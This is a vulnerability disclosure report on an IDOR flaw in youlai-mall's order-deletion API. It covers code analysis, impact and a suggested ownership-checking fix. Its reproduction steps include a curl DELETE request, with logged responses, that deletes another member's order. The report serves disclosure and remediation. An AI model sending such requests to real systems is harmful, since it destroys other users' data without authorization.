Submission #708178: youlai-mall latest Improper Control of Resource Identifiers (info)

Title: youlai-mall latest Improper Control of Resource Identifiers
Description:

# youlai-mall improper access control in DELETE /mall-oms/app-api/v1/orders/{orderId} enables horizontal privilege escalation and unauthorized order deletion on victim accounts

## Contributors: Huang Weigang

### 1. Vulnerability Impact

- youlai-mall (latest)
- `https://github.com/youlaitech/youlai-mall`

### 2. Vulnerability Location

- DELETE `/mall-oms/app-api/v1/orders/{orderId}`

### 3. Code Analysis

- File: `mall-oms/oms-boot/src/main/java/com/youlai/mall/oms/controller/app/OrderController.java`
- Route and method:

```java
@DeleteMapping("/{orderId}")
public Result<Boolean> deleteOrder(@PathVariable Long orderId) {
    // orderId is taken straight from the path and passed to the service
    boolean result = orderService.deleteById(orderId);
    return Result.success(result);
}
```

- Service: `mall-oms/oms-boot/src/main/java/com/youlai/mall/oms/service/impl/OrderServiceImpl.java`

```java
public boolean deleteById(Long orderId) {
    // hard delete by primary key; no check of who owns the order
    return this.removeById(orderId);
}
```

- Issues:
  - No ownership check: there is no validation that the supplied `orderId` belongs to the currently logged-in member (e.g., comparing the order's `memberId` with `SecurityUtils.getMemberId()`).
  - No role/permission control: there is no `@PreAuthorize`, so any authenticated App user can delete arbitrary orders.
  - Direct parameter trust: the attacker-controlled `orderId` is used directly in the database deletion without authorization.
  - Horizontal privilege escalation: an attacker who supplies a victim's `orderId` can delete that victim's orders.
  - No state validation: the order status is never checked, so even paid or shipped orders can be deleted.
  - No deletion auditing or soft-delete mechanism: the delete is a hard delete with no record of who initiated it.

### Vulnerability Reproduction

#### Preconditions

- The attacker has a valid App login token (`Authorization: Bearer <token>`).
- The victim's `orderId` is known or discoverable (via enumeration, sequential IDs, or other BOLA endpoints).
- Target endpoint: `DELETE /mall-oms/app-api/v1/orders/{orderId}`

#### Steps (horizontal privilege escalation: delete another user's order)

- Log in as User A (memberId=100) and obtain a valid token.
- Call the endpoint with User B's `orderId` (e.g., orderId=5001):

```bash
curl -X DELETE -H "Authorization: Bearer <token>" "https://<gateway>/mall-oms/app-api/v1/orders/5001"
```

- Observe a 200 OK response, for example:

```json
{"code":"00000","data":true,"msg":"一切ok"}
```

- Outcome: with no ownership validation, User A successfully deletes User B's order, causing data loss and business disruption.

#### Example request/response log (reference)

```json
{
  "data": {
    "request_data": {
      "method": "DELETE",
      "url": "http://10.15.196.160:9999/mall-oms/app-api/v1/orders/5001",
      "params": {},
      "json": {},
      "data": {},
      "files": {}
    },
    "response_data": {
      "code": "00000",
      "data": true,
      "msg": "一切ok"
    }
  },
  "test": {
    "request_data": {
      "method": "DELETE",
      "url": "http://10.15.196.160:9999/mall-oms/app-api/v1/orders/5001",
      "params": {},
      "json": {},
      "data": {},
      "files": {}
    },
    "response_data": {
      "code": "00000",
      "data": true,
      "msg": "一切ok"
    }
  }
}
```

### 4. Impact Description

- Unauthorized data deletion
  - Any logged-in user can delete arbitrary orders, causing permanent data loss and destruction of business records.
- Horizontal privilege escalation (BOLA/IDOR)
  - The `orderId` path parameter is not validated against the authenticated user's identity, allowing cross-account operations.
- Business logic bypass
  - Order deletion should respect business rules (e.g., only pending or cancelled orders may be deleted), but this endpoint allows deletion of any order regardless of status.
- Financial and operational impact
  - Deleting paid or shipped orders can cause financial discrepancies, inventory mismatches, and fulfillment failures.
- Lack of audit trail and recovery
  - A hard delete without logging makes forensic investigation impossible and prevents data recovery.
- Compliance violations
  - E-commerce platforms typically must retain orders for accounting, tax, and legal purposes; unauthorized deletion violates these requirements.
- Attack chain amplification
  - Combined with order enumeration or creation endpoints, attackers can systematically disrupt business operations across multiple accounts.
- System trust erosion
  - Users and administrators lose confidence in data integrity and platform reliability, damaging reputation and business continuity.
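The fix the Code Analysis section points at, as an added example that is not youlai-mall's own code: the service method re-checks ownership and order state before deleting, and the delete statement itself is scoped to the caller's `memberId` so a race between check and delete cannot widen it. Assumed names (not from the report): an `Order` entity with `getMemberId()`/`getStatus()`, an `OrderStatus` enum, `BusinessException`, and the MyBatis-Plus `ServiceImpl`/`LambdaQueryWrapper` base the project's `removeById` suggests; `SecurityUtils.getMemberId()` is the helper the report itself names.

```java
import java.util.EnumSet;
import java.util.Set;

import com.baomidou.mybatisplus.core.conditions.query.LambdaQueryWrapper;
import com.baomidou.mybatisplus.extension.service.impl.ServiceImpl;
import lombok.extern.slf4j.Slf4j;

// Hardened replacement for OrderServiceImpl.deleteById (example, not project code).
// Assumed: OrderMapper, Order, OrderStatus, BusinessException and
// SecurityUtils.getMemberId() exist with the shapes used below.
@Slf4j
public class OrderServiceImpl extends ServiceImpl<OrderMapper, Order> implements OrderService {

    // Assumed business rule: only unpaid or cancelled orders may be removed by the member.
    private static final Set<OrderStatus> DELETABLE =
            EnumSet.of(OrderStatus.PENDING_PAYMENT, OrderStatus.CANCELLED);

    @Override
    public boolean deleteById(Long orderId) {
        Long memberId = SecurityUtils.getMemberId(); // identity from the caller's token, not the request

        Order order = this.getById(orderId);
        // Same error for "does not exist" and "belongs to someone else", so the
        // response does not confirm whether another member's orderId is valid.
        if (order == null || !memberId.equals(order.getMemberId())) {
            throw new BusinessException("Order not found");
        }
        if (!DELETABLE.contains(order.getStatus())) {
            throw new BusinessException("Order cannot be deleted in its current state");
        }

        // Scope the DELETE itself by owner and state: even if the row changed
        // between the read above and this statement, nothing outside the
        // caller's own deletable orders can be affected.
        LambdaQueryWrapper<Order> scoped = new LambdaQueryWrapper<Order>()
                .eq(Order::getId, orderId)
                .eq(Order::getMemberId, memberId)
                .in(Order::getStatus, DELETABLE);
        boolean removed = this.remove(scoped);

        // Audit record of who deleted what; a soft-delete flag on Order would
        // additionally keep the row recoverable for accounting and forensics.
        log.info("order delete: memberId={} orderId={} status={} removed={}",
                memberId, orderId, order.getStatus(), removed);
        return removed;
    }
}
```

Adding `@PreAuthorize` on the controller method restricts which roles may reach the endpoint at all, but it does not replace the per-order ownership check above, which is what closes the horizontal escalation.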
Source: https://github.com/Hwwg/cve/issues/29
User: huangweigang (UID 88993)
Submitted: 2025-12-07 07:07 (6 months ago)
Moderated: 2025-12-25 10:50 (18 days later)
Status: Duplicate
VulDB entry: 334476 [youlaitech youlai-mall 1.0.0/2.0.0 /app-api/v1/orders/ orderId privilege escalation]
Points: 0
